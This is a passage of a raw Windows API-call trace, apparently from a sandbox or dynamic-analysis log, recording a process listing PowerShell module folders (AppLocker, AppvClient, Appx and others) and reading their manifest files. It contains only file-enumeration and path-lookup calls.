ftCreationTime.dwLowDateTime=0xeb8a4b7a, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0xeb8a4b7a, ftLastAccessTime.dwHighDateTime=0x1d5acdd, ftLastWriteTime.dwLowDateTime=0xeb8a4b7a, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Windows.AppBackgroundTask.Commands.dll", cAlternateFileName="")) returned 1 [0263.133] FindNextFileW (in: hFindFile=0x1acc78d0, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb8a4b7a, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0xeb8a4b7a, ftLastAccessTime.dwHighDateTime=0x1d5acdd, ftLastWriteTime.dwLowDateTime=0xeb8a4b7a, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x2138, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_BackgroundTask.Format.ps1xml", cAlternateFileName="")) returned 1 [0263.133] FindNextFileW (in: hFindFile=0x1acc78d0, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb8a4b7a, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0xeb8a4b7a, ftLastAccessTime.dwHighDateTime=0x1d5acdd, ftLastWriteTime.dwLowDateTime=0xeb8a4b7a, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 1 [0263.133] FindNextFileW (in: hFindFile=0x1acc78d0, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb8a4b7a, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0xeb8a4b7a, ftLastAccessTime.dwHighDateTime=0x1d5acdd, ftLastWriteTime.dwLowDateTime=0xeb8a4b7a, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 0 [0263.134] FindClose (in: hFindFile=0x1acc78d0 | out: hFindFile=0x1acc78d0) returned 1 [0263.134] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e348) returned 1 [0263.134] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e568) returned 1 [0263.134] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\AppBackgroundTask.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask\\appbackgroundtask.psd1")) returned 0x20 [0263.135] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\AppBackgroundTask.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5c [0263.135] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\AppBackgroundTask.psd1", nBufferLength=0x5c, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\AppBackgroundTask.psd1", lpFilePart=0x0) returned 0x5b [0263.135] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\AppBackgroundTask.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5c [0263.135] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\AppBackgroundTask.psd1", nBufferLength=0x5c, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\AppBackgroundTask.psd1", lpFilePart=0x0) returned 0x5b [0263.135] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e418) returned 1 [0263.135] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\AppBackgroundTask.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask\\appbackgroundtask.psd1"), fInfoLevelId=0x0, lpFileInformation=0x23d8220 | out: lpFileInformation=0x23d8220*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb8a4b7a, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0xdaf67bdc, ftLastAccessTime.dwHighDateTime=0x1d94215, ftLastWriteTime.dwLowDateTime=0xeb8a4b7a, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x3ab)) returned 1 [0263.136] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e3c8) returned 1 [0263.136] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e648) returned 1 [0263.136] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0263.136] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker", nBufferLength=0x3d, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c [0263.136] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker\\*"), lpFindFileData=0x1b83e3f0 | out: lpFindFileData=0x1b83e3f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1acc7c90 [0263.136] FindNextFileW (in: hFindFile=0x1acc7c90, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0263.136] FindNextFileW (in: hFindFile=0x1acc7c90, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x279a8c87, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf601581c, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0x279a8c87, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x422, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker.psd1", cAlternateFileName="")) returned 1 [0263.136] FindNextFileW (in: hFindFile=0x1acc7c90, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x279a8c87, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf601581c, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0x279a8c87, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x422, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker.psd1", cAlternateFileName="")) returned 0 [0263.136] FindClose (in: hFindFile=0x1acc7c90 | out: hFindFile=0x1acc7c90) returned 1 [0263.137] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e348) returned 1 [0263.137] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e568) returned 1 [0263.137] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker\\AppLocker.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker\\applocker.psd1")) returned 0x20 [0263.138] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker\\AppLocker.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4c [0263.138] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker\\AppLocker.psd1", nBufferLength=0x4c, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker\\AppLocker.psd1", lpFilePart=0x0) returned 0x4b [0263.138] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker\\AppLocker.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4c [0263.138] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker\\AppLocker.psd1", nBufferLength=0x4c, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker\\AppLocker.psd1", lpFilePart=0x0) returned 0x4b [0263.138] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e418) returned 1 [0263.138] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker\\AppLocker.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker\\applocker.psd1"), fInfoLevelId=0x0, lpFileInformation=0x23d8978 | out: lpFileInformation=0x23d8978*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x279a8c87, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xdafb4283, ftLastAccessTime.dwHighDateTime=0x1d94215, ftLastWriteTime.dwLowDateTime=0x279a8c87, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x422)) returned 1 [0263.138] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e3c8) returned 1 [0263.139] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e648) returned 1 [0263.139] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppvClient", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3e [0263.139] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppvClient", nBufferLength=0x3e, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppvClient", lpFilePart=0x0) returned 0x3d [0263.139] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppvClient\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appvclient\\*"), lpFindFileData=0x1b83e3f0 | out: lpFindFileData=0x1b83e3f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1acc7390 [0263.141] FindNextFileW (in: hFindFile=0x1acc7390, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0263.141] FindNextFileW (in: hFindFile=0x1acc7390, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25ed4aeb, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf603bb55, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0x25ed4aeb, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x2b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppvClient.psd1", cAlternateFileName="")) returned 1 [0263.141] FindNextFileW (in: hFindFile=0x1acc7390, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25ed4aeb, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x208660d, ftLastAccessTime.dwHighDateTime=0x1d5ace4, ftLastWriteTime.dwLowDateTime=0x208660d, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x11f6, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppVClientCmdlets.format.ps1xml", cAlternateFileName="")) returned 1 [0263.141] FindNextFileW (in: hFindFile=0x1acc7390, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25ed4aeb, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x208660d, ftLastAccessTime.dwHighDateTime=0x1d5ace4, ftLastWriteTime.dwLowDateTime=0x208660d, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppVClientCmdlets.psm1", cAlternateFileName="")) returned 1 [0263.141] FindNextFileW (in: hFindFile=0x1acc7390, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x744502b, ftLastAccessTime.dwHighDateTime=0x1d5ace4, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0263.141] FindNextFileW (in: hFindFile=0x1acc7390, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25efd14c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x208660d, ftLastAccessTime.dwHighDateTime=0x1d5ace4, ftLastWriteTime.dwLowDateTime=0x20ac84e, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0xacf38, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.AppV.AppvClientComConsumer.dll", cAlternateFileName="")) returned 1 [0263.141] FindNextFileW (in: hFindFile=0x1acc7390, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25ed4aeb, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf90370be, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0x208660d, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x1a938, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.AppV.AppVClientPowerShell.dll", cAlternateFileName="")) returned 1 [0263.141] FindNextFileW (in: hFindFile=0x1acc7390, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25efd14c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x208660d, ftLastAccessTime.dwHighDateTime=0x1d5ace4, ftLastWriteTime.dwLowDateTime=0x208660d, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x2a338, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.AppV.ClientProgrammability.Eventing.dll", cAlternateFileName="")) returned 1 [0263.142] FindNextFileW (in: hFindFile=0x1acc7390, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25efd14c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x208660d, ftLastAccessTime.dwHighDateTime=0x1d5ace4, ftLastWriteTime.dwLowDateTime=0x208660d, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x2a338, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.AppV.ClientProgrammability.Eventing.dll", cAlternateFileName="")) returned 0 [0263.142] FindClose (in: hFindFile=0x1acc7390 | out: hFindFile=0x1acc7390) returned 1 [0263.143] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e348) returned 1 [0263.143] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e568) returned 1 [0263.143] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppvClient\\AppvClient.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appvclient\\appvclient.psd1")) returned 0x20 [0263.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppvClient\\AppvClient.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4e [0263.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppvClient\\AppvClient.psd1", nBufferLength=0x4e, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppvClient\\AppvClient.psd1", lpFilePart=0x0) returned 0x4d [0263.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppvClient\\AppvClient.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4e [0263.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppvClient\\AppvClient.psd1", nBufferLength=0x4e, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppvClient\\AppvClient.psd1", lpFilePart=0x0) returned 0x4d [0263.144] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e418) returned 1 [0263.144] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppvClient\\AppvClient.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appvclient\\appvclient.psd1"), fInfoLevelId=0x0, lpFileInformation=0x23d9218 | out: lpFileInformation=0x23d9218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25ed4aeb, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xdafda4f6, ftLastAccessTime.dwHighDateTime=0x1d94215, ftLastWriteTime.dwLowDateTime=0x25ed4aeb, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x2b2)) returned 1 [0263.145] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e3c8) returned 1 [0263.145] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e648) returned 1 [0263.145] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x38 [0263.145] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx", nBufferLength=0x38, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx", lpFilePart=0x0) returned 0x37 [0263.145] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx\\*"), lpFindFileData=0x1b83e3f0 | out: lpFindFileData=0x1b83e3f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xa16872ee, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1acc7510 [0263.145] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xa16872ee, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0263.145] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb833158, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0x1a42fc2e, ftLastAccessTime.dwHighDateTime=0x1d94212, ftLastWriteTime.dwLowDateTime=0xeb833158, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x14bd, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.format.ps1xml", cAlternateFileName="")) returned 1 [0263.146] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb833158, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0xf667de04, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0xeb833158, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x57f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psd1", cAlternateFileName="")) returned 1 [0263.146] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb833158, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0x1a4c855e, ftLastAccessTime.dwHighDateTime=0x1d94212, ftLastWriteTime.dwLowDateTime=0xeb833158, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x1352, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psm1", cAlternateFileName="")) returned 1 [0263.146] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa16872ee, ftCreationTime.dwHighDateTime=0x1d5ace3, ftLastAccessTime.dwLowDateTime=0xa16872ee, ftLastAccessTime.dwHighDateTime=0x1d5ace3, ftLastWriteTime.dwLowDateTime=0xa16872ee, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0263.146] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0263.146] FindClose (in: hFindFile=0x1acc7510 | out: hFindFile=0x1acc7510) returned 1 [0263.147] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e348) returned 1 [0263.147] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e568) returned 1 [0263.147] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx\\Appx.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx\\appx.psd1")) returned 0x20 [0263.148] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx\\Appx.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x42 [0263.148] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx\\Appx.psd1", nBufferLength=0x42, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx\\Appx.psd1", lpFilePart=0x0) returned 0x41 [0263.148] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx\\Appx.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x42 [0263.148] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx\\Appx.psd1", nBufferLength=0x42, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx\\Appx.psd1", lpFilePart=0x0) returned 0x41 [0263.148] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e418) returned 1 [0263.148] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx\\Appx.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx\\appx.psd1"), fInfoLevelId=0x0, lpFileInformation=0x23d9a50 | out: lpFileInformation=0x23d9a50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb833158, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0x5f4eef68, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xeb833158, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x57f)) returned 1 [0263.149] SetThreadErrorMode (dwNewMode=0x0, 